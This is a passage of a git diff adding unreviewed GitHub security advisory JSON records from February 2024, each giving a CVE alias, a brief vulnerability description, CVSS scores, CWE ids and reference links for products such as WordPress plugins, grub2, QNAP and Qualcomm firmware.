through r45p0.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5643" + }, + { + "type": "WEB", + "url": "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3qmf-fj65-6vmf/GHSA-3qmf-fj65-6vmf.json b/advisories/unreviewed/2024/02/GHSA-3qmf-fj65-6vmf/GHSA-3qmf-fj65-6vmf.json new file mode 100644 index 0000000000000..95daa6212ede4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3qmf-fj65-6vmf/GHSA-3qmf-fj65-6vmf.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qmf-fj65-6vmf", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-4637" + ], + "details": "The WPvivid plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the restore() and get_restore_progress() function in versions up to, and including, 0.9.94. This makes it possible for unauthenticated attackers to invoke these functions and obtain full file paths if they have access to a back-up ID.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4637" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/class-wpvivid.php#L3736" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/class-wpvivid.php#L3943" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3023214/wpvivid-backuprestore/trunk/includes/class-wpvivid.php?contextall=1&old=3007861&old_path=%2Fwpvivid-backuprestore%2Ftrunk%2Fincludes%2Fclass-wpvivid.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bad0bd6b-9c88-4d31-90b5-92d3ceb8c0af?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3qrv-r8v8-pmw7/GHSA-3qrv-r8v8-pmw7.json b/advisories/unreviewed/2024/02/GHSA-3qrv-r8v8-pmw7/GHSA-3qrv-r8v8-pmw7.json new file mode 100644 index 0000000000000..a4b1e25fe55fa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3qrv-r8v8-pmw7/GHSA-3qrv-r8v8-pmw7.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3qrv-r8v8-pmw7", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-1048" + ], + "details": "A flaw was found in the grub2-set-bootflag utility of grub2. After the fix of CVE-2019-14865, grub2-set-bootflag will create a temporary file with the new grubenv content and rename it to the original grubenv file. If the program is killed before the rename operation, the temporary file will not be removed and may fill the filesystem when invoked multiple times, resulting in a filesystem out of free inodes or blocks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1048" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-1048" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256827" + }, + { + "type": "WEB", + "url": "https://www.openwall.com/lists/oss-security/2024/02/06/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/06/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-459" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T18:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3rpv-j58g-7jfj/GHSA-3rpv-j58g-7jfj.json b/advisories/unreviewed/2024/02/GHSA-3rpv-j58g-7jfj/GHSA-3rpv-j58g-7jfj.json new file mode 100644 index 0000000000000..58ffa26c78a0e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3rpv-j58g-7jfj/GHSA-3rpv-j58g-7jfj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3rpv-j58g-7jfj", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2024-0269" + ], + "details": "ManageEngine ADAudit Plus versions 7270 and below are vulnerable to the Authenticated SQL injection in File-Summary DrillDown. This issue has been fixed and released in version 7271.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0269" + }, + { + "type": "WEB", + "url": "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3wh9-2fg7-9h5g/GHSA-3wh9-2fg7-9h5g.json b/advisories/unreviewed/2024/02/GHSA-3wh9-2fg7-9h5g/GHSA-3wh9-2fg7-9h5g.json new file mode 100644 index 0000000000000..c60d221795af8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3wh9-2fg7-9h5g/GHSA-3wh9-2fg7-9h5g.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3wh9-2fg7-9h5g", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33065" + ], + "details": "Information disclosure in Audio while accessing AVCS services from ADSP payload.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33065" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3wxq-76w9-ghcp/GHSA-3wxq-76w9-ghcp.json b/advisories/unreviewed/2024/02/GHSA-3wxq-76w9-ghcp/GHSA-3wxq-76w9-ghcp.json new file mode 100644 index 0000000000000..fc6d987049e5a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3wxq-76w9-ghcp/GHSA-3wxq-76w9-ghcp.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3wxq-76w9-ghcp", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24940" + ], + "details": "In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24940" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22", + "CWE-23" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3x65-x797-c3v9/GHSA-3x65-x797-c3v9.json b/advisories/unreviewed/2024/02/GHSA-3x65-x797-c3v9/GHSA-3x65-x797-c3v9.json new file mode 100644 index 0000000000000..e07d1c93dbbc7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3x65-x797-c3v9/GHSA-3x65-x797-c3v9.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3x65-x797-c3v9", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2024-22012" + ], + "details": "In TBD of TBD, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22012" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-02-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json b/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json new file mode 100644 index 0000000000000..cc38cf33c2b65 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3x87-pjpc-6c9c", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24864" + ], + "details": "A race condition was found in the Linux kernel's media/dvb-core in dvbdmx_write() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24864" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8178" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-3xhr-vwcx-8p3c/GHSA-3xhr-vwcx-8p3c.json b/advisories/unreviewed/2024/02/GHSA-3xhr-vwcx-8p3c/GHSA-3xhr-vwcx-8p3c.json new file mode 100644 index 0000000000000..bfecc0512eabd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-3xhr-vwcx-8p3c/GHSA-3xhr-vwcx-8p3c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3xhr-vwcx-8p3c", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43533" + ], + "details": "Transient DOS in WLAN Firmware when the length of received beacon is less than length of ieee802.11 beacon frame.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43533" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-42fh-xcj5-fxwg/GHSA-42fh-xcj5-fxwg.json b/advisories/unreviewed/2024/02/GHSA-42fh-xcj5-fxwg/GHSA-42fh-xcj5-fxwg.json new file mode 100644 index 0000000000000..c8596e1ffb6ac --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-42fh-xcj5-fxwg/GHSA-42fh-xcj5-fxwg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42fh-xcj5-fxwg", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-6675" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerability in National Keep Cyber Security Services CyberMath allows Upload a Web Shell to a Web Server.This issue affects CyberMath: from v.1.4 before v.1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6675" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0080" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-42gc-pq7v-4hjr/GHSA-42gc-pq7v-4hjr.json b/advisories/unreviewed/2024/02/GHSA-42gc-pq7v-4hjr/GHSA-42gc-pq7v-4hjr.json new file mode 100644 index 0000000000000..2921f252c84e1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-42gc-pq7v-4hjr/GHSA-42gc-pq7v-4hjr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-42gc-pq7v-4hjr", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41280" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41280" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-439f-fqrh-gmv2/GHSA-439f-fqrh-gmv2.json b/advisories/unreviewed/2024/02/GHSA-439f-fqrh-gmv2/GHSA-439f-fqrh-gmv2.json new file mode 100644 index 0000000000000..4a6da24a636fd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-439f-fqrh-gmv2/GHSA-439f-fqrh-gmv2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-439f-fqrh-gmv2", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-6672" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in National Keep Cyber Security Services CyberMath allows Stored XSS.This issue affects CyberMath: from v1.4 before v1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6672" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0080" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-444j-ccxr-jrr5/GHSA-444j-ccxr-jrr5.json b/advisories/unreviewed/2024/02/GHSA-444j-ccxr-jrr5/GHSA-444j-ccxr-jrr5.json new file mode 100644 index 0000000000000..755222bdbc711 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-444j-ccxr-jrr5/GHSA-444j-ccxr-jrr5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-444j-ccxr-jrr5", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6953" + ], + "details": "The PDF Generator For Fluent Forms – The Contact Form Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the header, PDF body and footer content parameters in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploitation level depends on who is granted the right to create forms by an administrator. This level can be as low as contributor, but by default is admin.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6953" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3023486%40fluentforms-pdf%2Ftrunk&old=2929799%40fluentforms-pdf%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b6675c48-43d4-4394-a4a3-f753bdaa5c4e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-44qh-gw8j-g2gv/GHSA-44qh-gw8j-g2gv.json b/advisories/unreviewed/2024/02/GHSA-44qh-gw8j-g2gv/GHSA-44qh-gw8j-g2gv.json new file mode 100644 index 0000000000000..3cedcd855fc48 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-44qh-gw8j-g2gv/GHSA-44qh-gw8j-g2gv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-44qh-gw8j-g2gv", + "modified": "2024-02-02T09:30:22Z", + "published": "2024-02-02T09:30:22Z", + "aliases": [ + "CVE-2024-21860" + ], + "details": "\nin OpenHarmony v4.0.0 and prior versions\n\nallow an adjacent attacker arbitrary code execution in any apps through use after free.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21860" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-44vw-x4jf-3q2f/GHSA-44vw-x4jf-3q2f.json b/advisories/unreviewed/2024/02/GHSA-44vw-x4jf-3q2f/GHSA-44vw-x4jf-3q2f.json new file mode 100644 index 0000000000000..a69c630932aa4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-44vw-x4jf-3q2f/GHSA-44vw-x4jf-3q2f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-44vw-x4jf-3q2f", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-24160" + ], + "details": "MRCMS 3.0 contains a Cross-Site Scripting (XSS) vulnerability via /admin/system/saveinfo.do.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24160" + }, + { + "type": "WEB", + "url": "https://github.com/wy876/cve/issues/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-44xm-468v-w3hq/GHSA-44xm-468v-w3hq.json b/advisories/unreviewed/2024/02/GHSA-44xm-468v-w3hq/GHSA-44xm-468v-w3hq.json new file mode 100644 index 0000000000000..069065b5b7ed3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-44xm-468v-w3hq/GHSA-44xm-468v-w3hq.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-44xm-468v-w3hq", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-1252" + ], + "details": "A vulnerability classified as critical was found in Tongda OA 2017 up to 11.9. Affected by this vulnerability is an unknown functionality of the file /general/attendance/manage/ask_duty/delete.php. The manipulation of the argument ASK_DUTY_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252991.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1252" + }, + { + "type": "WEB", + "url": "https://github.com/b51s77/cve/blob/main/sql.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252991" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252991" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-457g-xg5v-227f/GHSA-457g-xg5v-227f.json b/advisories/unreviewed/2024/02/GHSA-457g-xg5v-227f/GHSA-457g-xg5v-227f.json new file mode 100644 index 0000000000000..54f330ca944b4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-457g-xg5v-227f/GHSA-457g-xg5v-227f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-457g-xg5v-227f", + "modified": "2024-02-01T12:30:21Z", + "published": "2024-02-01T12:30:21Z", + "aliases": [ + "CVE-2023-52188" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Russell Jamieson Footer Putter allows Stored XSS.This issue affects Footer Putter: from n/a through 1.17.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52188" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/footer-putter/wordpress-footer-putter-plugin-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-459m-qjwc-xv42/GHSA-459m-qjwc-xv42.json b/advisories/unreviewed/2024/02/GHSA-459m-qjwc-xv42/GHSA-459m-qjwc-xv42.json new file mode 100644 index 0000000000000..06172aae2e1ed --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-459m-qjwc-xv42/GHSA-459m-qjwc-xv42.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-459m-qjwc-xv42", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50327" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 uses insecure HTTP methods which could allow a remote attacker to perform unauthorized file request modification. IBM X-Force ID: 275109.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50327" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275109" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-436", + "CWE-650" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-45qr-r98p-f6qx/GHSA-45qr-r98p-f6qx.json b/advisories/unreviewed/2024/02/GHSA-45qr-r98p-f6qx/GHSA-45qr-r98p-f6qx.json new file mode 100644 index 0000000000000..09fa78aee0682 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-45qr-r98p-f6qx/GHSA-45qr-r98p-f6qx.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45qr-r98p-f6qx", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22903" + ], + "details": "Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the deleteUpdateAPK function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22903" + }, + { + "type": "WEB", + "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2024/Jan/32" + }, + { + "type": "WEB", + "url": "http://vinchin.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-45x9-627r-26hh/GHSA-45x9-627r-26hh.json b/advisories/unreviewed/2024/02/GHSA-45x9-627r-26hh/GHSA-45x9-627r-26hh.json new file mode 100644 index 0000000000000..a81cb5c3e10c4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-45x9-627r-26hh/GHSA-45x9-627r-26hh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45x9-627r-26hh", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-7014" + ], + "details": "The Author Box, Guest Author and Co-Authors for Your Posts – Molongui plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.7.4 via the 'ma_debu' parameter. This makes it possible for unauthenticated attackers to extract sensitive data including post author emails and names if applicable.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7014" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3019084/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/538e9ce3-2d48-44ad-bd08-8eead3ef15c3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-4683-q5fv-6j3x/GHSA-4683-q5fv-6j3x.json b/advisories/unreviewed/2024/02/GHSA-4683-q5fv-6j3x/GHSA-4683-q5fv-6j3x.json new file mode 100644 index 0000000000000..98d9f50130a0e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-4683-q5fv-6j3x/GHSA-4683-q5fv-6j3x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": 